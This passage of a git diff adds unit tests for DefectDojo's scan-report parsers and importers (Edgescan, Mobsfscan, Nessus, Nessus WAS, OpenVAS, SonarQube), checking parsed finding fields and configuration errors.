Product_API_Scan_Configuration() + cls.test_2.api_scan_configuration = cls.api_scan_configuration_2 + cls.api_scan_configuration_2.product = cls.product_2 + cls.api_scan_configuration_2.tool_configuration = cls.tool_configuration + cls.api_scan_configuration_2.service_key_1 = 'SERVICE_KEY_1' + + cls.findings = json.dumps({'a': 1, 'b': 2}) + + def test_prepare_client_do_not_match(self): + product_3 = Product() + engagement_3 = Engagement() + engagement_3.product = product_3 + test_3 = Test() + test_3.engagement = engagement_3 + api_scan_configuration_3 = Product_API_Scan_Configuration() + api_scan_configuration_3.product = self.product + test_3.api_scan_configuration = api_scan_configuration_3 + + with self.assertRaisesRegex(Exception, 'API Scan Configuration for Edgescan and Product do not match.'): + edgescan_importer = EdgescanImporter() + edgescan_importer.prepare_client(test_3) + + @patch('dojo.models.Product_API_Scan_Configuration.objects') + def test_prepare_client_more_than_one_configuration(self, mock_foo): + mock_foo.filter.return_value = mock_foo + mock_foo.count.return_value = 2 + + with self.assertRaisesRegex(Exception, 'More than one Product API Scan Configuration has been configured, but none of them has been chosen.'): + edgescan_importer = EdgescanImporter() + edgescan_importer.prepare_client(self.test) + + mock_foo.filter.assert_called_with(product=self.product) + + @patch('dojo.models.Product_API_Scan_Configuration.objects') + def test_prepare_client_no_configuration(self, mock_foo): + mock_foo.filter.return_value = mock_foo + mock_foo.count.return_value = 0 + + with self.assertRaisesRegex(Exception, 'There are no API Scan Configurations for this Product.'): + edgescan_importer = EdgescanImporter() + edgescan_importer.prepare_client(self.test) + + mock_foo.filter.assert_called_with(product=self.product) + + @patch('dojo.models.Product_API_Scan_Configuration.objects') + def test_prepare_client_one_product_configuration(self, mock_foo): + mock_foo.filter.return_value = mock_foo + mock_foo.count.return_value = 1 + mock_foo.first.return_value = self.api_scan_configuration + + edgescan_importer = EdgescanImporter() + edgescan_api, api_scan_configuration = edgescan_importer.prepare_client(self.test) + + mock_foo.filter.assert_called_with(product=self.product) + self.assertEqual(api_scan_configuration, self.api_scan_configuration) + self.assertEqual(edgescan_api.api_key, 'API_KEY') + + def test_prepare_client_one_test_configuration(self): + edgescan_importer = EdgescanImporter() + edgescan_api, api_scan_configuration = edgescan_importer.prepare_client(self.test_2) + + self.assertEqual(api_scan_configuration, self.api_scan_configuration_2) + self.assertEqual(edgescan_api.api_key, 'API_KEY') + + @patch('dojo.tools.edgescan.importer.EdgescanAPI.get_findings') + def test_get_findings(self, mock_foo): + mock_foo.return_value = self.findings + + edgescan_importer = EdgescanImporter() + my_findings = edgescan_importer.get_findings(self.test_2) + + mock_foo.assert_called_with('SERVICE_KEY_1') + self.assertEqual(my_findings, self.findings) diff --git a/unittests/tools/test_edgescan_parser.py b/unittests/tools/test_edgescan_parser.py new file mode 100644 index 00000000000..41c545148c7 --- /dev/null +++ b/unittests/tools/test_edgescan_parser.py @@ -0,0 +1,67 @@ +from django.test import TestCase + +from dojo.tools.edgescan.parser import EdgescanParser +from dojo.models import Test + + +class TestEdgescanParser(TestCase): + + def test_parse_file_with_no_vuln_has_no_findings(self): + with open("unittests/scans/edgescan/no_vuln.json") as testfile: + parser = EdgescanParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + def test_parse_file_with_one_vuln_has_one_findings(self): + with open("unittests/scans/edgescan/one_vuln.json") as testfile: + parser = EdgescanParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual(finding.title, "Cross-site scripting (reflected)") + self.assertEqual(finding.date, "2014-12-05") + self.assertEqual(finding.cwe, 75) + self.assertEqual(1, len(finding.unsaved_vulnerability_ids)) + self.assertEqual(finding.unsaved_vulnerability_ids[0], "CVE-2021-5300") + self.assertEqual(finding.cvssv3, "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N") + self.assertEqual(finding.url, "http://test.example.com") + self.assertEqual(finding.severity, "High") + self.assertEqual(finding.description, "Description Text") + self.assertEqual(finding.mitigation, "Remediation Text") + self.assertEqual(finding.active, True) + self.assertEqual(finding.tags, ["APPROVED", "Demo-Asset", "ABC Corporate", "test"]) + self.assertEqual(finding.unique_id_from_tool, 21581) + + def test_parse_file_with_multiple_vuln_has_multiple_finding(self): + with open("unittests/scans/edgescan/many_vulns.json") as testfile: + parser = EdgescanParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(2, len(findings)) + finding_1 = findings[0] + finding_2 = findings[1] + self.assertEqual(finding_1.title, "Cross-site scripting (reflected)") + self.assertEqual(finding_1.date, "2014-12-05") + self.assertEqual(finding_1.cwe, 75) + self.assertEqual(1, len(finding_1.unsaved_vulnerability_ids)) + self.assertEqual(finding_1.unsaved_vulnerability_ids[0], "CVE-2021-5300") + self.assertEqual(finding_1.cvssv3, None) + self.assertEqual(finding_1.url, "http://test.example.com") + self.assertEqual(finding_1.severity, "High") + self.assertEqual(finding_1.description, "Description Text") + self.assertEqual(finding_1.mitigation, "Remediation Text") + self.assertEqual(finding_1.active, True) + self.assertEqual(finding_1.tags, ["APPROVED", "Demo-Asset"]) + self.assertEqual(finding_1.unique_id_from_tool, 21581) + self.assertEqual(finding_2.title, "Directory listing") + self.assertEqual(finding_2.date, "2014-09-05") + self.assertEqual(finding_2.cwe, 77) + self.assertEqual(1, len(finding_2.unsaved_vulnerability_ids)) + self.assertEqual(finding_2.unsaved_vulnerability_ids[0], "CVE-2021-4008") + self.assertEqual(finding_2.cvssv3, "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N") + self.assertEqual(finding_2.url, "http://example.test.com") + self.assertEqual(finding_2.severity, "Low") + self.assertEqual(finding_2.description, "Description Text 2") + self.assertEqual(finding_2.mitigation, "Remediation Text 2") + self.assertEqual(finding_2.active, False) + self.assertEqual(finding_2.tags, []) + self.assertEqual(finding_2.unique_id_from_tool, 21583) diff --git a/unittests/tools/test_mobsfscan_parser.py b/unittests/tools/test_mobsfscan_parser.py new file mode 100644 index 00000000000..0de491211b0 --- /dev/null +++ b/unittests/tools/test_mobsfscan_parser.py @@ -0,0 +1,85 @@ +from ..dojo_test_case import DojoTestCase +from dojo.tools.mobsfscan.parser import MobsfscanParser +from dojo.models import Test + + +class TestMobsfscanParser(DojoTestCase): + + def test_parse_no_findings(self): + testfile = open("unittests/scans/mobsfscan/no_findings.json") + parser = MobsfscanParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + self.assertEqual(0, len(findings)) + + def test_parse_many_findings(self): + testfile = open("unittests/scans/mobsfscan/many_findings.json") + parser = MobsfscanParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + self.assertEqual(7, len(findings)) + + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("android_certificate_transparency", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(295, finding.cwe) + self.assertIsNotNone(finding.references) + + with self.subTest(i=1): + finding = findings[1] + self.assertEqual("android_kotlin_hardcoded", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(798, finding.cwe) + self.assertIsNotNone(finding.references) + self.assertEqual("app/src/main/java/com/routes/domain/analytics/event/Signatures.kt", finding.file_path) + self.assertEqual(10, finding.line) + + with self.subTest(i=2): + finding = findings[2] + self.assertEqual("android_prevent_screenshot", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(200, finding.cwe) + self.assertIsNotNone(finding.references) + + with self.subTest(i=3): + finding = findings[3] + self.assertEqual("android_root_detection", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(919, finding.cwe) + self.assertIsNotNone(finding.references) + + with self.subTest(i=4): + finding = findings[4] + self.assertEqual("android_safetynet", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(353, finding.cwe) + self.assertIsNotNone(finding.references) + + with self.subTest(i=5): + finding = findings[5] + self.assertEqual("android_ssl_pinning", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(295, finding.cwe) + self.assertIsNotNone(finding.references) + + with self.subTest(i=6): + finding = findings[6] + self.assertEqual("android_tapjacking", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual(1, finding.nb_occurences) + self.assertIsNotNone(finding.description) + self.assertEqual(200, finding.cwe) + self.assertIsNotNone(finding.references) diff --git a/unittests/tools/test_nessus_parser.py b/unittests/tools/test_nessus_parser.py new file mode 100644 index 00000000000..fd4712738a6 --- /dev/null +++ b/unittests/tools/test_nessus_parser.py @@ -0,0 +1,171 @@ +from os import path +from ..dojo_test_case import DojoTestCase +from dojo.tools.nessus.parser import NessusXMLParser, NessusCSVParser, NessusParser +from dojo.models import Finding, Test, Engagement, Product + + +class TestNessusParser(DojoTestCase): + def create_test(self): + test = Test() + test.engagement = Engagement() + test.engagement.product = Product() + return test + + def test_parse_some_findings(self): + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln.xml")) + parser = NessusXMLParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(6, len(findings)) + finding = findings[5] + self.assertEqual("Info", finding.severity) + self.assertIsNone(finding.cwe) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual("https", endpoint.protocol) + endpoint = finding.unsaved_endpoints[1] + self.assertEqual("tcp", endpoint.protocol) + + def test_parse_some_findings_csv(self): + """Test one report provided by a user""" + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln.csv")) + parser = NessusCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(4, len(findings)) + for i in [0, 1, 2, 3]: + finding = findings[i] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("Medium", finding.severity) + self.assertEqual(0, finding.cwe) + # check some data + finding = findings[0] + self.assertEqual(1, len(finding.unsaved_endpoints)) + self.assertEqual("10.1.1.1", finding.unsaved_endpoints[0].host) + self.assertEqual("AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P/RL:O/RC:C", finding.cvssv3) + # TODO work on component attributes for Nessus CSV parser + self.assertIsNotNone(finding.component_name) + self.assertEqual("md5", finding.component_name) + self.assertEqual(1, len(finding.unsaved_vulnerability_ids)) + self.assertEqual("CVE-2004-2761", finding.unsaved_vulnerability_ids[0]) + # this vuln have 'CVE-2013-2566,CVE-2015-2808' as CVE + finding = findings[3] + self.assertEqual(2, len(finding.unsaved_vulnerability_ids)) + self.assertEqual("CVE-2013-2566", finding.unsaved_vulnerability_ids[0]) + self.assertEqual("CVE-2015-2808", finding.unsaved_vulnerability_ids[1]) + + def test_parse_some_findings_csv2(self): + """Test that use default columns of Nessus Pro 8.13.1 (#257)""" + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln2-default.csv")) + parser = NessusCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(29, len(findings)) + finding = findings[0] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("Info", finding.severity) + self.assertIsNone(finding.unsaved_vulnerability_ids) + self.assertEqual(0, finding.cwe) + self.assertEqual("HTTP Server Type and Version", finding.title) + finding = findings[25] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("SSL Certificate Signed Using Weak Hashing Algorithm (Known CA)", finding.title) + self.assertEqual("Info", finding.severity) + self.assertEqual(1, len(finding.unsaved_vulnerability_ids)) + self.assertEqual("CVE-2004-2761", finding.unsaved_vulnerability_ids[0]) + + def test_parse_some_findings_csv2_all(self): + """Test that use a report with all columns of Nessus Pro 8.13.1 (#257)""" + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln2-all.csv")) + parser = NessusCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(29, len(findings)) + finding = findings[0] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("Info", finding.severity) + self.assertIsNone(finding.unsaved_vulnerability_ids) + self.assertEqual(0, finding.cwe) + self.assertEqual("HTTP Server Type and Version", finding.title) + finding = findings[25] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("SSL Certificate Signed Using Weak Hashing Algorithm (Known CA)", finding.title) + self.assertEqual("Info", finding.severity) + self.assertEqual(1, len(finding.unsaved_vulnerability_ids)) + self.assertEqual("CVE-2004-2761", finding.unsaved_vulnerability_ids[0]) + + def test_parse_some_findings_csv_bytes(self): + """This tests is designed to test the parser with different read modes""" + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln2-all.csv")) + parser = NessusCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln2-all.csv"), "rt") + parser = NessusCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_many_vuln2-all.csv"), "rb") + parser = NessusCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + + def test_parse_some_findings_samples(self): + """Test that come from samples repo""" + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_v_unknown.xml")) + parser = NessusParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(32, len(findings)) + + finding = findings[0] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("Info", finding.severity) + self.assertFalse(finding.unsaved_vulnerability_ids) + self.assertEqual("Nessus Scan Information", finding.title) + + finding = findings[25] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual("Nessus SYN scanner", finding.title) + self.assertEqual("Info", finding.severity) + self.assertFalse(finding.unsaved_vulnerability_ids) + endpoint = finding.unsaved_endpoints[26] + self.assertEqual("http", endpoint.protocol) + endpoint = finding.unsaved_endpoints[37] + self.assertEqual("tcp", endpoint.protocol) + + finding = findings[9] + self.assertEqual(7, len(finding.unsaved_vulnerability_ids)) + for vulnerability_id in finding.unsaved_vulnerability_ids: + self.assertEqual('CVE-2005-1794', vulnerability_id) + + def test_parse_some_findings_with_cvssv3(self): + """test with cvssv3""" + testfile = open(path.join(path.dirname(__file__), "../scans/nessus/nessus_with_cvssv3.nessus")) + parser = NessusXMLParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(48, len(findings)) + finding = findings[3] + self.assertEqual("Medium", finding.severity) + self.assertIsNone(finding.cwe) + print(finding.unsaved_endpoints) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual("http", endpoint.protocol) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", finding.cvssv3) diff --git a/unittests/tools/test_nessus_was_parser.py b/unittests/tools/test_nessus_was_parser.py new file mode 100644 index 00000000000..8c3f7280617 --- /dev/null +++ b/unittests/tools/test_nessus_was_parser.py @@ -0,0 +1,91 @@ +from ..dojo_test_case import DojoTestCase +from dojo.tools.nessus_was.parser import NessusWASXMLParser, NessusWASCSVParser +from dojo.models import Finding, Test, Engagement, Product + + +class TestNessusWASParser(DojoTestCase): + + def create_test(self): + test = Test() + test.engagement = Engagement() + test.engagement.product = Product() + return test + + def test_parse_many_findings_xml(self): + testfile = open("unittests/scans/nessus_was/nessus_was_many_vuln.xml") + parser = NessusWASXMLParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(5, len(findings)) + for i in [0, 1, 2, 3, 4]: + finding = findings[i] + self.assertEqual('http', finding.unsaved_endpoints[0].protocol) + self.assertIsNone(finding.cwe) + finding = findings[0] + self.assertEqual('High', finding.severity) + self.assertEqual('Cross-Site Scripting (XSS)', finding.title) + + def test_parse_one_findings_xml(self): + testfile = open("unittests/scans/nessus_was/nessus_was_one_vuln.xml") + parser = NessusWASXMLParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual('http', finding.unsaved_endpoints[0].protocol) + self.assertIsNone(finding.cwe) + self.assertEqual('High', finding.severity) + self.assertEqual('Cross-Site Scripting (XSS)', finding.title) + + def test_parse_no_findings_xml(self): + testfile = open("unittests/scans/nessus_was/nessus_was_no_vuln.xml") + parser = NessusWASXMLParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(0, len(findings)) + + def test_parse_many_findings_csv(self): + testfile = open("unittests/scans/nessus_was/nessus_was_many_vuln.csv") + parser = NessusWASCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(5, len(findings)) + for i in [0, 1, 2, 3, 4]: + finding = findings[i] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual('google.com', finding.unsaved_endpoints[0].host) + self.assertIsNone(finding.unsaved_vulnerability_ids) + finding = findings[0] + self.assertEqual('7.1', finding.cvssv3_score) + self.assertEqual('High', finding.severity) + self.assertEqual('http', finding.unsaved_endpoints[0].protocol) + + def test_parse_one_findings_csv(self): + testfile = open("unittests/scans/nessus_was/nessus_was_one_vuln.csv") + parser = NessusWASCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertIn(finding.severity, Finding.SEVERITIES) + self.assertEqual('google.com', finding.unsaved_endpoints[0].host) + self.assertIsNone(finding.unsaved_vulnerability_ids) + self.assertEqual('7.1', finding.cvssv3_score) + self.assertEqual('High', finding.severity) + self.assertEqual('http', finding.unsaved_endpoints[0].protocol) + + def test_parse_no_findings_csv(self): + testfile = open("unittests/scans/nessus_was/nessus_was_no_vuln.csv") + parser = NessusWASCSVParser() + findings = parser.get_findings(testfile, self.create_test()) + self.assertEqual(0, len(findings)) diff --git a/unittests/tools/test_openvas_csv_parser.py b/unittests/tools/test_openvas_csv_parser.py new file mode 100644 index 00000000000..ce964e5be36 --- /dev/null +++ b/unittests/tools/test_openvas_csv_parser.py @@ -0,0 +1,50 @@ +from ..dojo_test_case import DojoTestCase +from dojo.tools.openvas_csv.parser import OpenVASCsvParser +from dojo.models import Test, Engagement, Product + + +class TestOpenVASUploadCsvParser(DojoTestCase): + + def test_openvas_csv_one_vuln(self): + with open("unittests/scans/openvas/one_vuln.csv") as f: + test = Test() + test.engagement = Engagement() + test.engagement.product = Product() + parser = OpenVASCsvParser() + findings = parser.get_findings(f, test) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + # finding + self.assertEqual("SSH Weak Encryption Algorithms Supported", findings[0].title) + self.assertEqual("Medium", findings[0].severity) + # endpoints + self.assertEqual(1, len(findings[0].unsaved_endpoints)) + # endpoint + self.assertEqual("10.0.0.8", findings[0].unsaved_endpoints[0].host) + self.assertEqual("tcp", findings[0].unsaved_endpoints[0].protocol) + self.assertEqual(22, findings[0].unsaved_endpoints[0].port) + + def test_openvas_csv_many_vuln(self): + with open("unittests/scans/openvas/many_vuln.csv") as f: + test = Test() + test.engagement = Engagement() + test.engagement.product = Product() + parser = OpenVASCsvParser() + findings = parser.get_findings(f, test) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(4, len(findings)) + # finding + finding = findings[3] + self.assertEqual("HTTP Brute Force Logins With Default Credentials Reporting", finding.title) + self.assertEqual("High", finding.severity) + # endpoints + self.assertEqual(1, len(finding.unsaved_endpoints)) + # endpoint + endpoint = finding.unsaved_endpoints[0] + self.assertEqual("LOGSRV", endpoint.host) + self.assertEqual("tcp", endpoint.protocol) + self.assertEqual(9200, endpoint.port) diff --git a/unittests/tools/test_sonarqube_api_parser.py b/unittests/tools/test_sonarqube_api_parser.py new file mode 100644 index 00000000000..7524c5595ab --- /dev/null +++ b/unittests/tools/test_sonarqube_api_parser.py @@ -0,0 +1,57 @@ +import json +from unittest import mock + +from dojo.tools.sonarqube_api.parser import SonarQubeAPIParser +from ..dojo_test_case import DojoTestCase +from dojo.models import Tool_Type, Tool_Configuration, Product_Type, Product, Engagement, Test + + +def dummy_product(self, *args, **kwargs): + with open("unittests/scans/sonarqube_api/product.json") as json_file: + data = json.load(json_file) + return data + + +def dummy_issues(self, *args, **kwargs): + with open("unittests/scans/sonarqube_api/issues.json") as json_file: + data = json.load(json_file) + return data + + +def dummy_rule(self, *args, **kwargs): + with open("unittests/scans/sonarqube_api/rule.json") as json_file: + data = json.load(json_file) + return data + + +def dummy_hotspot_rule(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/hotspots/rule.json') as json_file: + data = json.load(json_file) + return data + + +def empty_list(self, *args, **kwargs): + return list() + + +class TestSonarqubeApiParser(DojoTestCase): + def setUp(self): + product_type, _ = Product_Type.objects.get_or_create(name="Fake unit tests") + product, _ = Product.objects.get_or_create(name="product", prod_type=product_type) + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + # build Sonarqube conf (the parser need it) + tool_type, _ = Tool_Type.objects.get_or_create(name="SonarQube") + tool_conf, _ = Tool_Configuration.objects.get_or_create( + name="SQ1_unittests", authentication_type="API", tool_type=tool_type + ) + + @mock.patch("dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project", dummy_product) + @mock.patch("dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule", dummy_rule) + @mock.patch("dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues", dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_get_findings(self): + parser = SonarQubeAPIParser() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) diff --git a/unittests/tools/test_sonarqube_importer.py b/unittests/tools/test_sonarqube_importer.py new file mode 100644 index 00000000000..00788db19ea --- /dev/null +++ b/unittests/tools/test_sonarqube_importer.py @@ -0,0 +1,468 @@ +import json +from unittest import mock + +from dojo.tools.sonarqube_api.importer import SonarQubeApiImporter +from ..dojo_test_case import DojoTestCase, get_unit_tests_path +from dojo.models import Test, Engagement, Product, Product_API_Scan_Configuration + + +def dummy_product(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/product.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_issues(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/issues.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_rule(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/rule.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_rule_wo_html_desc(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/rule_wo_html_desc.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_no_hotspot(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/hotspots/no_vuln.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_one_hotspot(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/hotspots/one_vuln.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_many_hotspots(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/hotspots/many_vulns.json') as json_file: + data = json.load(json_file) + return data + + +def dummy_hotspot_rule(self, *args, **kwargs): + with open(get_unit_tests_path() + '/scans/sonarqube_api/hotspots/rule.json') as json_file: + data = json.load(json_file) + return data + + +def empty_list(self, *args, **kwargs): + return list() + + +class TestSonarqubeImporterNoSQToolConfig(DojoTestCase): + # Testing case no 1. https://github.com/DefectDojo/django-DefectDojo/pull/4676 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + def test_parser(self): + with self.assertRaisesRegex(Exception, 'No SonarQube tool is configured.'): + SonarQubeApiImporter.prepare_client(self.test) + + +class TestSonarqubeImporterOneSQToolConfig(DojoTestCase): + # Testing case no 2. https://github.com/DefectDojo/django-DefectDojo/pull/4676 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + finding = findings[0] + self.assertEqual("AWKWIl8pZpu0CyehMfc4", finding.unique_id_from_tool) + finding = findings[1] + self.assertEqual("AWKWIlkyZpu0CyehMfb7", finding.unique_id_from_tool) + + +class TestSonarqubeImporterMultipleSQToolConfig(DojoTestCase): + # Testing case no 3. https://github.com/DefectDojo/django-DefectDojo/pull/4676 + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + def test_parser(self): + with self.assertRaisesRegex(Exception, 'More than one Tool Configuration for SonarQube exists.'): + SonarQubeApiImporter.prepare_client(self.test) + + +class TestSonarqubeImporterOneSQConfigNoKey(DojoTestCase): + # Testing case no 4. https://github.com/DefectDojo/django-DefectDojo/pull/4676 without Project key + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json', + 'unit_sonarqube_sqcNoKey.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + + +class TestSonarqubeImporterOneSQConfigWithKey(DojoTestCase): + # Testing case no 5. https://github.com/DefectDojo/django-DefectDojo/pull/4676 without Project key + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json', + 'unit_sonarqube_sqcWithKey.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_project', dummy_product) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_rule', dummy_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_issues', dummy_issues) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.get_hotspot_rule', dummy_hotspot_rule) + @mock.patch('dojo.tools.sonarqube_api.api_client.SonarQubeAPI.find_hotspots', empty_list) + def test_parser(self): + parser = SonarQubeApiImporter() + findings = parser.get_findings(None, self.test) + self.assertEqual(2, len(findings)) + + +class TestSonarqubeImporterMultipleSQConfigs(DojoTestCase): + # Testing case no 6. https://github.com/DefectDojo/django-DefectDojo/pull/4676 without Project key + fixtures = [ + 'unit_sonarqube_toolType.json', + 'unit_sonarqube_toolConfig1.json', + 'unit_sonarqube_toolConfig2.json', + 'unit_sonarqube_product.json', + 'unit_sonarqube_sqcNoKey.json', + 'unit_sonarqube_sqcWithKey.json' + ] + + def setUp(self): + product = Product.objects.get(name='product') + engagement = Engagement(product=product) + self.test = Test(engagement=engagement) + + def test_parser(self): + with self.assertRaisesRegex(Exception, 'More than one Product API Scan Configuration has been configured, but none of them has been chosen.'): + 